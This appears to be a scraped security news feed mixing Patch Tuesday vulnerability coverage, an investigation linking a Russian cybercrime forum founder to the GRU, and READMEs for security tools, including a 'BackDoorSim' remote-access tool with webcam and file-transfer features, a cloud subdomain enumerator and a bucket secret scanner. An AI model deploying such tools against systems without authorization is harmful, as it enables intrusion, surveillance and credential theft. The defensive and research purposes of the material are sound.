    Narang highlighted CVE-2024-21390 as a particularly interesting vulnerability in this month’s Patch Tuesday release, which is an elevation of privilege flaw in Microsoft Authenticator, the software giant’s app for multi-factor authentication. Narang said a prerequisite for an attacker to exploit this flaw is to already have a presence on the device either through malware or a malicious application.

    “If a victim has closed and re-opened the Microsoft Authenticator app, an attacker could obtain multi-factor authentication codes and modify or delete accounts from the app,” Narang said. “Having access to a target device is bad enough as they can monitor keystrokes, steal data and redirect users to phishing websites, but if the goal is to remain stealth, they could maintain this access and steal multi-factor authentication codes in order to login to sensitive accounts, steal data or hijack the accounts altogether by changing passwords and replacing the multi-factor authentication device, effectively locking the user out of their accounts.”

    CVE-2024-21334 earned a CVSS (danger) score of 9.8 (10 is the worst), and it concerns a weakness in Open Management Infrastructure (OMI), a Linux-based cloud infrastructure in Microsoft Azure. Microsoft says attackers could connect to OMI instances over the Internet without authentication, and then send specially crafted data packets to gain remote code execution on the host device.

    CVE-2024-21435 is a CVSS 8.8 vulnerability in Windows OLE, which acts as a kind of backbone for a great deal of communication between applications that people use every day on Windows, said Ben McCarthy, lead cybersecurity engineer at Immersive Labs.

    “With this vulnerability, there is an exploit that allows remote code execution, the attacker needs to trick a user into opening a document, this document will exploit the OLE engine to download a malicious DLL to gain code execution on the system,” Breen explained. “The attack complexity has been described as low meaning there is less of a barrier to entry for attackers.”

    A full list of the vulnerabilities addressed by Microsoft this month is available at the SANS Internet Storm Center, which breaks down the updates by severity and urgency.

    Finally, Adobe today issued security updates that fix dozens of security holes in a wide range of products, including Adobe Experience Manager, Adobe Premiere Pro, ColdFusion 2023 and 2021, Adobe Bridge, Lightroom, and Adobe Animate. Adobe said it is not aware of active exploitation against any of the flaws.

    By the way, Adobe recently enrolled all of its Acrobat users into a “new generative AI feature” that scans the contents of your PDFs so that its new “AI Assistant” can  “understand your questions and provide responses based on the content of your PDF file.” Adobe provides instructions on how to disable the AI features and opt out here.

    BackDoorSim - An Educational Look Into Remote Administration Tools

    By: Zion3R


    BackdoorSim is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer and BackdoorClient. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.


    Disclaimer

    This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.


    Features
    • File Transfer: Upload and download files between server and client.
    • Screenshot Capture: Take screenshots from the client's system.
    • System Information Gathering: Retrieve detailed system and security software information.
    • Camera Access: Capture images from the client's webcam.
    • Notifications: Send and display notifications on the client system.
    • Help Menu: Easy access to command information and usage.

    Installation

    To set up BackdoorSim, you will need to install it on both the server and client machines.

    1. Clone the repository:

    $ git clone https://github.com/HalilDeniz/BackDoorSim.git

    2. Navigate to the project directory:

    $ cd BackDoorSim

    3. Install the required dependencies:

    $ pip install -r requirements.txt


    Usage

    After starting both the server and client, you can use the following commands in the server's command prompt:

    • upload [file_path]: Upload a file to the client.
    • download [file_path]: Download a file from the client.
    • screenshot: Capture a screenshot from the client.
    • sysinfo: Get system information from the client.
    • securityinfo: Get security software status from the client.
    • camshot: Capture an image from the client's webcam.
    • notify [title] [message]: Send a notification to the client.
    • help: Display the help menu.

    Disclaimer

    BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.


    DepNot: RansomwareSim

    If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool


    BackdoorSim: An Educational Look Into Remote Administration Tools

    If you want to read our article about BackdoorSim:


    Contributing

    Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.
    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.


    Contact

    For any inquiries or further information, you can reach me through the following channels:



    AzSubEnum - Azure Service Subdomain Enumeration

    By: Zion3R


    AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.


    How it works?

    AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.

    With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.
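
    At its core, this kind of enumeration is just permuting a base name against known Azure service DNS suffixes and keeping whatever resolves. A minimal sketch of the approach (the suffix list, permutation pattern and function names below are illustrative assumptions, not AzSubEnum's actual implementation):

    import socket

    # A few common Azure service suffixes (illustrative, not exhaustive).
    AZURE_SUFFIXES = [
        "azurewebsites.net",       # App Services
        "blob.core.windows.net",   # Storage accounts
        "database.windows.net",    # SQL databases
        "vault.azure.net",         # Key Vaults
        "azurecr.io",              # Container Registry
    ]

    def enumerate_azure_subdomains(base: str, permutations: list[str]) -> list[str]:
        candidates = [base] + [f"{base}-{p}" for p in permutations] + [f"{base}{p}" for p in permutations]
        found = []
        for name in candidates:
            for suffix in AZURE_SUFFIXES:
                fqdn = f"{name}.{suffix}"
                try:
                    socket.gethostbyname(fqdn)  # resolves only if the resource exists
                    found.append(fqdn)
                except socket.gaierror:
                    pass
        return found

    print(enumerate_azure_subdomains("retailcorp", ["dev", "prod", "backup"]))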


    Why did I create this?

    During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.


    Usage
    ➜  AzSubEnum git:(main) ✗ python3 azsubenum.py --help
    usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]

    Azure Subdomain Enumeration

    options:
    -h, --help show this help message and exit
    -b BASE, --base BASE Base name to use
    -v, --verbose Show verbose output
    -t THREADS, --threads THREADS
    Number of threads for concurrent execution
    -p PERMUTATIONS, --permutations PERMUTATIONS
    File containing permutations

    Basic enumeration:

    python3 azsubenum.py -b retailcorp --thread 10

    Using permutation wordlists:

    python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt

    With verbose output:

    python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt --verbose




    MrHandler - Linux Incident Response Reporting

    By: Zion3R

     


    MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.
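
    The core loop is straightforward: open an SSH session, run a fixed set of triage commands, and drop each command's output into an HTML report. A rough sketch with paramiko (the command list and report layout are assumptions for illustration, not MR.Handler's actual templates):

    import html
    import paramiko

    TRIAGE_COMMANDS = ["uname -a", "ip a", "last -n 20", "ps aux", "ss -tulpn"]  # illustrative set

    def collect_report(host: str, user: str, password: str, out_file: str = "report.html") -> None:
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(host, username=user, password=password, timeout=10)
        sections = []
        for cmd in TRIAGE_COMMANDS:
            _, stdout, _ = client.exec_command(cmd)
            output = stdout.read().decode(errors="replace")
            sections.append(f"<h2>{html.escape(cmd)}</h2><pre>{html.escape(output)}</pre>")
        client.close()
        with open(out_file, "w") as f:
            f.write("<html><body><h1>Incident response triage</h1>" + "".join(sections) + "</body></html>")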



    INSTALLATION INSTRUCTIONS
      $ pip3 install colorama
    $ pip3 install paramiko
    $ git clone https://github.com/emrekybs/BlueFish.git
    $ cd MrHandler
    $ chmod +x MrHandler.py
    $ python3 MrHandler.py


    Report



    WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

    By: Zion3R


    WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.
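
    The basic idea, pulling word-like tokens out of a target's pages and turning them into a custom wordlist, can be sketched in a few lines of Python (the token pattern and minimum length below are arbitrary choices, not the project's actual rules):

    import re
    import requests

    def build_wordlist(url: str, min_len: int = 4) -> list[str]:
        # Fetch the page and keep unique word-like tokens as wordlist candidates.
        page = requests.get(url, timeout=10).text
        tokens = re.findall(rf"[A-Za-z][A-Za-z0-9_-]{{{min_len - 1},}}", page)
        return sorted(set(tokens))

    if __name__ == "__main__":
        for word in build_wordlist("https://target-web.com"):
            print(word)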


    Done
    • [x] Scan Static Files.
    • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
    • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

    Installation

    From Git
    git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
    cd web-wordlist-generator && pip3 install -r requirements.txt
    python3 generator.py -d target-web.com

    From Dockerfile

    You can run this application in a container after building the Dockerfile.

    docker build -t webwordlistgenerator .
    docker run webwordlistgenerator -d target-web.com -o

    From DockerHub

    You can run this application in a container after pulling the image from DockerHub.

    docker pull osmankandemir/webwordlistgenerator:v1.0
    docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

    Usage
    -d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
    -p PROXY, --proxy PROXY Use an HTTP proxy. --proxy 0.0.0.0:8080
    -a AGENT, --agent AGENT Use a custom User-Agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    -o PRINT, --print PRINT Print outputs to the terminal screen.



    Fat Patch Tuesday, February 2024 Edition

    Microsoft Corp. today pushed software updates to plug more than 70 security holes in its Windows operating systems and related products, including two zero-day vulnerabilities that are already being exploited in active attacks.

    Top of the heap on this Fat Patch Tuesday is CVE-2024-21412, a “security feature bypass” in the way Windows handles Internet Shortcut Files that Microsoft says is being targeted in active exploits. Redmond’s advisory for this bug says an attacker would need to convince or trick a user into opening a malicious shortcut file.

    Researchers at Trend Micro have tied the ongoing exploitation of CVE-2024-21412 to an advanced persistent threat group dubbed “Water Hydra,” which they say has been using the vulnerability to execute a malicious Microsoft Installer File (.msi) that in turn unloads a remote access trojan (RAT) onto infected Windows systems.

    The other zero-day flaw is CVE-2024-21351, another security feature bypass — this one in the built-in Windows SmartScreen component that tries to screen out potentially malicious files downloaded from the Web. Kevin Breen at Immersive Labs says it’s important to note that this vulnerability alone is not enough for an attacker to compromise a user’s workstation, and instead would likely be used in conjunction with something like a spear phishing attack that delivers a malicious file.

    Satnam Narang, senior staff research engineer at Tenable, said this is the fifth vulnerability in Windows SmartScreen patched since 2022 and all five have been exploited in the wild as zero-days. They include CVE-2022-44698 in December 2022, CVE-2023-24880 in March 2023, CVE-2023-32049 in July 2023 and CVE-2023-36025 in November 2023.

    Narang called special attention to CVE-2024-21410, an “elevation of privilege” bug in Microsoft Exchange Server that Microsoft says is likely to be exploited by attackers. Attacks on this flaw would lead to the disclosure of NTLM hashes, which could be leveraged as part of an NTLM relay or “pass the hash” attack, which lets an attacker masquerade as a legitimate user without ever having to log in.

    “We know that flaws that can disclose sensitive information like NTLM hashes are very valuable to attackers,” Narang said. “A Russian-based threat actor leveraged a similar vulnerability to carry out attacks – CVE-2023-23397 is an Elevation of Privilege vulnerability in Microsoft Outlook patched in March 2023.”

    Microsoft notes that prior to its Exchange Server 2019 Cumulative Update 14 (CU14), a security feature called Extended Protection for Authentication (EPA), which provides NTLM credential relay protections, was not enabled by default.

    “Going forward, CU14 enables this by default on Exchange servers, which is why it is important to upgrade,” Narang said.

    Rapid7’s lead software engineer Adam Barnett highlighted CVE-2024-21413, a critical remote code execution bug in Microsoft Office that could be exploited just by viewing a specially-crafted message in the Outlook Preview pane.

    “Microsoft Office typically shields users from a variety of attacks by opening files with Mark of the Web in Protected View, which means Office will render the document without fetching potentially malicious external resources,” Barnett said. “CVE-2024-21413 is a critical RCE vulnerability in Office which allows an attacker to cause a file to open in editing mode as though the user had agreed to trust the file.”

    Barnett stressed that administrators responsible for Office 2016 installations who apply patches outside of Microsoft Update should note the advisory lists no fewer than five separate patches which must be installed to achieve remediation of CVE-2024-21413; individual update knowledge base (KB) articles further note that partially-patched Office installations will be blocked from starting until the correct combination of patches has been installed.

    It’s a good idea for Windows end-users to stay current with security updates from Microsoft, which can quickly pile up otherwise. That doesn’t mean you have to install them on Patch Tuesday. Indeed, waiting a day or three before updating is a sane response, given that sometimes updates go awry and usually within a few days Microsoft has fixed any issues with its patches. It’s also smart to back up your data and/or image your Windows drive before applying new updates.

    For a more detailed breakdown of the individual flaws addressed by Microsoft today, check out the SANS Internet Storm Center’s list. For those admins responsible for maintaining larger Windows environments, it often pays to keep an eye on Askwoody.com, which frequently points out when specific Microsoft updates are creating problems for a number of users.

    From Cybercrime Saul Goodman to the Russian GRU

    In 2021, the exclusive Russian cybercrime forum Mazafaka was hacked. The leaked user database shows one of the forum’s founders was an attorney who advised Russia’s top hackers on the legal risks of their work, and what to do if they got caught. A review of this user’s hacker identities shows that during his time on the forums he served as an officer in the special forces of the GRU, the foreign military intelligence agency of the Russian Federation.

    Launched in 2001 under the tagline “Network terrorism,” Mazafaka would evolve into one of the most guarded Russian-language cybercrime communities. The forum’s member roster included a Who’s Who of top Russian cybercriminals, and it featured sub-forums for a wide range of cybercrime specialities, including malware, spam, coding and identity theft.

    One representation of the leaked Mazafaka database.

    In almost any database leak, the first accounts listed are usually the administrators and early core members. But the Mazafaka user information posted online was not a database file per se, and it was clearly edited, redacted and restructured by whoever released it. As a result, it can be difficult to tell which members are the earliest users.

    The original Mazafaka is known to have been launched by a hacker using the nickname “Stalker.” However, the lowest numbered (non-admin) user ID in the Mazafaka database belongs to another individual who used the handle “Djamix,” and the email address djamix@mazafaka[.]ru.

    From the forum’s inception until around 2008, Djamix was one of its most active and eloquent contributors. Djamix told forum members he was a lawyer, and nearly all of his posts included legal analyses of various public cases involving hackers arrested and charged with cybercrimes in Russia and abroad.

    “Hiding with purely technical parameters will not help in a serious matter,” Djamix advised Maza members in September 2007. “In order to ESCAPE the law, you need to KNOW the law. This is the most important thing. Technical capabilities cannot overcome intelligence and cunning.”

    Stalker himself credited Djamix with keeping Mazafaka online for so many years. In a retrospective post published to Livejournal in 2014 titled, “Mazafaka, from conception to the present day,” Stalker said Djamix had become a core member of the community.

    “This guy is everywhere,” Stalker said of Djamix. “There’s not a thing on [Mazafaka] that he doesn’t take part in. For me, he is a stimulus-irritant and thanks to him, Maza is still alive. Our rallying force!”

    Djamix told other forum denizens he was a licensed attorney who could be hired for remote or in-person consultations, and his posts on Mazafaka and other Russian boards show several hackers facing legal jeopardy likely took him up on this offer.

    “I have the right to represent your interests in court,” Djamix said on the Russian-language cybercrime forum Verified in Jan. 2011. “Remotely (in the form of constant support and consultations), or in person – this is discussed separately. As well as the cost of my services.”

    WHO IS DJAMIX?

    A search on djamix@mazafaka[.]ru at DomainTools.com reveals this address has been used to register at least 10 domain names since 2008. Those include several websites about life in and around Sochi, Russia, the site of the 2014 Winter Olympics, as well as a nearby coastal town called Adler. All of those sites say they were registered to an Aleksei Safronov from Sochi who also lists Adler as a hometown.

    The breach tracking service Constella Intelligence finds that the phone number associated with those domains — +7.9676442212 — is tied to a Facebook account for an Aleksei Valerievich Safronov from Sochi. Mr. Safronov’s Facebook profile, which was last updated in October 2022, says his ICQ instant messenger number is 53765. This is the same ICQ number assigned to Djamix in the Mazafaka user database.

    The Facebook account for Aleksey Safronov.

    A “Djamix” account on the forum privetsochi[.]ru (“Hello Sochi”) says this user was born Oct. 2, 1970, and that his website is uposter[.]ru. This Russian language news site’s tagline is, “We Create Communication,” and it focuses heavily on news about Sochi, Adler, Russia and the war in Ukraine, with a strong pro-Kremlin bent.

    Safronov’s Facebook profile also gives his Skype username as “Djamixadler,” and it includes dozens of photos of him dressed in military fatigues along with a regiment of soldiers deploying in fairly remote areas of Russia. Some of those photos date back to 2008.

    In several of the images, we can see a patch on the arm of Safronov’s jacket that bears the logo of the Spetsnaz GRU, a special forces unit of the Russian military. According to a 2020 report from the Congressional Research Service, the GRU operates both as an intelligence agency — collecting human, cyber, and signals intelligence — and as a military organization responsible for battlefield reconnaissance and the operation of Russia’s Spetsnaz military commando units.

    Mr. Safronov posted this image of himself on Facebook in 2016. The insignia of the GRU can be seen on his sleeve.

    “In recent years, reports have linked the GRU to some of Russia’s most aggressive and public intelligence operations,” the CRS report explains. “Reportedly, the GRU played a key role in Russia’s occupation of Ukraine’s Crimea region and invasion of eastern Ukraine, the attempted assassination of former Russian intelligence officer Sergei Skripal in the United Kingdom, interference in the 2016 U.S. presidential elections, disinformation and propaganda operations, and some of the world’s most damaging cyberattacks.”

    According to the Russia-focused investigative news outlet Meduza, in 2014 the Russian Defense Ministry created its “information-operation troops” for action in “cyber-confrontations with potential adversaries.”

    “Later, sources in the Defense Ministry explained that these new troops were meant to ‘disrupt the potential adversary’s information networks,'” Meduza reported in 2018. “Recruiters reportedly went looking for ‘hackers who have had problems with the law.'”

    Mr. Safronov did not respond to multiple requests for comment. A 2018 treatise written by Aleksei Valerievich Safronov titled “One Hundred Years of GRU Military Intelligence” explains the significance of the bat in the seal of the GRU.

    “One way or another, the bat is an emblem that unites all active and retired intelligence officers; it is a symbol of unity and exclusivity,” Safronov wrote. “And, in general, it doesn’t matter who we’re talking about – a secret GRU agent somewhere in the army or a sniper in any of the special forces brigades. They all did and are doing one very important and responsible thing.”

    It’s unclear what role Mr. Safronov plays or played in the GRU, but it seems likely the military intelligence agency would have exploited his considerable technical skills, knowledge and connections on the Russian cybercrime forums.

    Searching on Safronov’s domain uposter[.]ru in Constella Intelligence reveals that this domain was used in 2022 to register an account at a popular Spanish-language discussion forum dedicated to helping applicants prepare for a career in the Guardia Civil, one of Spain’s two national police forces. Pivoting on that Russian IP in Constella shows three other accounts were created at the same Spanish user forum around the same date.

    Mark Rasch is a former cybercrime prosecutor for the U.S. Department of Justice who now serves as chief legal officer for the New York cybersecurity firm Unit 221B. Rasch said there has always been a close relationship between the GRU and the Russian hacker community, noting that in the early 2000s the GRU was soliciting hackers with the skills necessary to hack US banks in order to procure funds to help finance Russia’s war in Chechnya.

    “The guy is heavily hooked into the Russian cyber community, and that’s useful for intelligence services,” Rasch said. “He could have been infiltrating the community to monitor it for the GRU. Or he could just be a guy wearing a military uniform.”

    U.S. Imposes Visa Restrictions on those Involved in Illegal Spyware Surveillance

    The U.S. State Department said it's implementing a new policy that imposes visa restrictions on individuals who are linked to the illegal use of commercial spyware to surveil civil society members. "The misuse of commercial spyware threatens privacy and freedoms of expression, peaceful assembly, and association," Secretary of State Antony Blinken said. "Such targeting has been

    BucketLoot - An Automated S3-compatible Bucket Inspector

    By: Zion3R


    BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

    The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

    BucketLoot comes with a guest mode by default, which means a user doesn't need to specify any API tokens or access keys in order to run a scan. The tool will scrape a maximum of 1,000 files that are returned in the XML response; if the storage bucket contains more than 1,000 entries the user would like to scan, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.
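
    In guest mode the scan boils down to fetching the bucket's public XML listing, pulling each object, and running regexes over anything stored as plain text. A simplified sketch (the example signature and bucket URL are placeholders for illustration; BucketLoot ships its own lists in regexes.json and vulnFiles.json):

    import re
    import requests
    import xml.etree.ElementTree as ET

    S3_NS = "{http://s3.amazonaws.com/doc/2006-03-01/}"
    AWS_KEY_RE = re.compile(r"AKIA[0-9A-Z]{16}")  # hypothetical single signature

    def scan_bucket(bucket_url: str) -> None:
        # An unauthenticated listing returns at most 1,000 keys in a single XML page.
        listing = requests.get(bucket_url, timeout=10).text
        keys = [k.text for k in ET.fromstring(listing).iter(f"{S3_NS}Key")]
        for key in keys:
            body = requests.get(f"{bucket_url.rstrip('/')}/{key}", timeout=10).text
            for match in AWS_KEY_RE.findall(body):
                print(f"[!] possible AWS key in {key}: {match}")

    scan_bucket("https://example-bucket.s3.amazonaws.com")  # placeholder bucket URL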

    Features

    Secret Scanning

    Scans for more than 80 unique regex signatures that can help uncover secret exposures, tagged with their severity, in the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

    Sensitive File Checks

    Accidental sensitive file leaks are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a list of 80+ unique regex signatures in vulnFiles.json that allows users to flag these sensitive files based on file names or extensions.

    Dig Mode

    Want to quickly check whether a target website is using a misconfigured bucket that is leaking secrets or other sensitive data? Dig Mode allows you to pass non-S3 targets and lets the tool scrape URLs from the response body for scanning.

    Asset Extraction

    Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs, subdomains and domains that could be present in an exposed storage bucket, giving you a chance of discovering hidden endpoints and an edge over traditional recon tools.

    Searching

    The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

    To know more about our Attack Surface Management platform, check out NVADR.



    Raven - CI/CD Security Analyzer

    By: Zion3R


    RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

    With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub.

    We listed all vulnerabilities discovered using Raven in the tool's Hall of Fame.


    What is Raven

    The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

    • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
    • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
    • Query Library: We created a library of pre-defined queries based on research conducted by the community.
    • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

    Possible usages for Raven:

    • Scanner for your own organization's security
    • Scanning specified organizations for bug bounty purposes
    • Scan everything and report issues found to save the internet
    • Research and learning purposes

    This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

    Why Raven

    In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

    • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
    • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
    • We detailed a completely different attack vector, 3rd-party integration risks, in the most popular project on GitHub, and thousands more.
    • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
    • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

    Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

    It was for these reasons that Raven was created: a framework for CI/CD security analysis, with GitHub Actions workflows as the first use case. In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

    Setup && Run

    To get started with Raven, follow these installation instructions:

    Step 1: Install the Raven package

    pip3 install raven-cycode

    Step 2: Setup a local Redis server and Neo4j database

    docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
    docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

    Another way to set up the environment is by running our provided docker compose file:

    git clone https://github.com/CycodeLabs/raven.git
    cd raven
    make setup

    Step 3: Run Raven Downloader

    Org mode:

    raven download org --token $GITHUB_TOKEN --org-name RavenDemo

    Crawl mode:

    raven download crawl --token $GITHUB_TOKEN --min-stars 1000

    Step 4: Run Raven Indexer

    raven index

    Step 5: Inspect the results through the reporter

    raven report --format raw

    At this point, it is possible to inspect the data in the Neo4j database by connecting to http://localhost:7474/browser/.
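
    Besides the browser UI, the indexed graph can also be queried programmatically. The sketch below uses the official neo4j Python driver with the default credentials from Step 2; the generic Cypher query simply counts nodes per label to confirm that the indexer populated the database (the labels you see will depend on what was indexed).

    from neo4j import GraphDatabase

    # Connection details match the docker run command above (neo4j / 123456789).
    driver = GraphDatabase.driver("neo4j://localhost:7687", auth=("neo4j", "123456789"))

    with driver.session() as session:
        # Count indexed nodes per label as a quick sanity check.
        result = session.run("MATCH (n) RETURN labels(n) AS labels, count(n) AS total")
        for record in result:
            print(record["labels"], record["total"])

    driver.close()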

    Prerequisites

    • Python 3.9+
    • Docker Compose v2.1.0+
    • Docker Engine v1.13.0+

    Infrastructure

    Raven uses two primary Docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

    Usage

    The tool contains three main functionalities: download, index, and report.

    Download

    Download Organization Repositories

    usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --org-name ORG_NAME Organization name to download the workflows

    Download Public Repositories

    usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --max-stars MAX_STARS
    Maximum number of stars for a repository
    --min-stars MIN_STARS
    Minimum number of stars for a repository, default : 1000

    Index

    usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
    [--clean-neo4j] [--debug]

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
    --debug Whether to print debug statements, default: False

    Report

    usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
    [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
    [--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
    [--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
    {slack} ...

    positional arguments:
    {slack}
    slack Send report to slack channel

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
    --tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
    Filter queries with specific tag
    --severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
    Filter queries by severity level (default: info)
    --queries-path QUERIES_PATH, -dp QUERIES_PATH
    Queries folder (default: library)
    --format {raw,json}, -f {raw,json}
    Report format (default: raw)

    Examples

    Retrieve all workflows and actions associated with the organization.

    raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

    Scrape all publicly accessible GitHub repositories.

    raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

    After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

    raven index --debug

    Now, we can generate a report using our query library.

    raven report --severity high --tag injection --tag unauthenticated

    Rate Limiting

    For effective rate limiting, you should supply a GitHub token. For authenticated users, the following rate limits apply:

    • Code search - 30 queries per minute
    • Any other API - 5000 per hour

    Research Knowledge Base

    Current Limitations

    • It is possible to run an external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
    • It is possible to run an external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
    • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is to try to find it in the existing repository.
    • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

    Future Research Work

